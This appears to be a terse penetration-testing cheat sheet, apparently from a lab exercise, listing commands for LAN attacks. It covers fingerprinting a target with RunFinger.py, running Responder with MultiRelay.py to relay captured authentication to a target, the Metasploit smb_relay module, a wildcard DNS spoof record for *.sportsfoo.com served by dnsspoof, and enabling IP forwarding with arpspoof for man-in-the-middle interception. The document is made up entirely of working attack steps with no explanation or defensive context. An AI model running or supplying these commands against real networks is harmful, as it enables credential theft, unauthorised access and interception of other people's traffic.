1. Run RunFinger.py -i<target IP> against target
2. Modify the Responder.confconfiguration file and disable the “SMB” server and “HTTP” server options by setting the values to “Off”.
3.python Responder.py -I eth0 –lm
4. python MultiRelay.py -t <target IP> –u ALL
SMB Relay:
use windows/smb/smb_relay
set target SMBHOST
set SRVHOST
Configure DNS spoof record
echo “172.16.5.150 *.sportsfoo.com” > dns
Run DNS spoof
dnsspoof -i tap0 -f dns
Run Arp Mitm
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 172.16.5.30 172.16.5.1
arpspoof -i tap0 -t 172.16.5.1 172.16.5.3